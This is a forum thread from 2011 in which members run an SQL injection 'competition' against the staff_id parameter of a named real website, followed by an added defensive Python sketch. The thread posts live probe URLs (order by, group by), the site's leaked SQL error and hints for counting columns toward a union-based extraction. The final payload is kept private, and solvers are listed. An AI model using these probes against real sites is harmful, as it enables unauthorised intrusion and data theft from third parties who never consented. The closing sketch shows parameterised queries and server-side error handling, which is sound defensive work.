vlad1395 Posted August 12, 2011
A new competition, which I hope you will like.
- The syntax will not be made public; send it by PM!
- Post here only a screenshot as proof that you solved it (without the solution being visible).
Task: Extract whatever you want.
Difficulty: Easy
Method: Union Based
Vulnerable Parameter: ICI -
SOURCE: HF
Proof: http://img685.imageshack.us/img685/4452/icij.png
NOTE: The injection is to be done ONLY on the parameter I gave.
Solvers
1. daemien/denjacker
2. ZeroCold
Edited August 24, 2011 by vlad1395

gigaevil Posted August 14, 2011
I have been trying for 20 minutes, but I get nothing apart from an SQL error. A little help would be interesting, or, if it is over, how you did it.

denjacker Posted August 14, 2011
Tell us where you got stuck so we know how to help you further.

gigaevil Posted August 14, 2011
I am a beginner in white hat hacking. For example, I found that it is indeed vulnerable to SQL injection.
Initially I wrote:
ICI - +order+by+1--
The SQL server gave me an error, which it should not have, since column 1 exists.
Even if I write 100 it gives me the same error.
Shall we discuss in private?

denjacker Posted August 14, 2011
Let's discuss here so the others understand too.
http://www.communityinclusion.org/staff.php?staff_id=129+order+by+1--
Let's look at the error more closely:
error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 order by 1-- ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5' at line 3
From this you should deduce:
1] the comment used to terminate the query is incomplete or ... useless.
2] you cannot use "order by 1 ORDER BY rank" --> because it will generate a syntax error.
Try to calculate the number of columns with GROUP BY and then come back to point 1]. In fact, that is the essential problem for solving the competition.

gigaevil Posted August 14, 2011
I tried
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1
and still no luck.

denjacker Posted August 14, 2011
No, brother...
http://www.communityinclusion.org/staff.php?staff_id=129+group+by+156353535353543534
error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 group by 156353535353543534 ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.
Unknown column '156353535353543534' in 'group statement'

totti93 Posted August 23, 2011
There is no point in using GROUP BY over and over when the error clearly shows that 6 columns are selected...

xaren Posted August 23, 2011
Unknown column 'rank' in 'order clause'
Could I replace that rank with a digit or @@version or ... ? !

vlad1395 (Author) Posted August 23, 2011
@Skiddie: The link works.
@xaren: I don't understand the question.
@All: Has anyone else done the inj3ction..? If so, post a screenshot here, or send it by PM. Have a nice day!

Net_Spy Posted September 7, 2011
Nice share, vlad. Done. I was so stupid to look the termination, I was trying to make it more complex; indeed it was fuckin easy.
Regards
Net_Spy
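
Added example, not part of the original thread or the site's code: a defender's reading of the error output quoted above, which shows the request value concatenated into the statement and the failed SQL echoed back to the visitor. The sketch binds staff_id as a parameter and keeps database errors server-side; Python's sqlite3 stands in for the PHP/MySQL page, and the sample rows, function names and response strings are assumptions.

```python
import logging
import re
import sqlite3
import uuid

log = logging.getLogger("staff_page")

# Statement taken from the error text in the thread, with the request value
# bound as a parameter. `rank` is left out of ORDER BY (reported as unknown).
QUERY = """
SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb,
       article_year_pub, article_month_pub
FROM article a, article_staff at
WHERE at.article_id = a.article_id AND at.staff_id = ?
ORDER BY article_year_pub DESC, article_month_pub DESC LIMIT 5
"""

def make_db():
    """Constructed sample data; an in-memory sqlite3 database stands in for MySQL."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (article_id INTEGER PRIMARY KEY, article_title TEXT,
            timestamp TEXT, article_blurb TEXT,
            article_year_pub INT, article_month_pub INT);
        CREATE TABLE article_staff (article_id INT, staff_id INT);
        INSERT INTO article VALUES (1, 'Sample A', '2011-01-01', 'blurb', 2011, 1);
        INSERT INTO article VALUES (2, 'Sample B', '2010-06-01', 'blurb', 2010, 6);
        INSERT INTO article_staff VALUES (1, 129), (2, 129);
    """)
    return db

def staff_articles(db, raw_staff_id, query=QUERY):
    """Return (status, body); body never carries SQL text or driver errors."""
    # Allow-list check: digits only, so trailing SQL keywords are refused
    # before any statement is built.
    if not re.fullmatch(r"[0-9]{1,9}", raw_staff_id or ""):
        return 400, "invalid staff_id"
    try:
        rows = db.execute(query, (int(raw_staff_id),)).fetchall()
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:8]
        # Full detail goes to the server log; the client only gets a reference.
        log.error("query failed ref=%s err=%s", ref, exc)
        return 500, f"internal error (ref {ref})"
    return 200, [row[1] for row in rows]
```

The `query` argument exists only so the error path can be exercised with a statement that fails, such as one that still orders by the missing `rank` column.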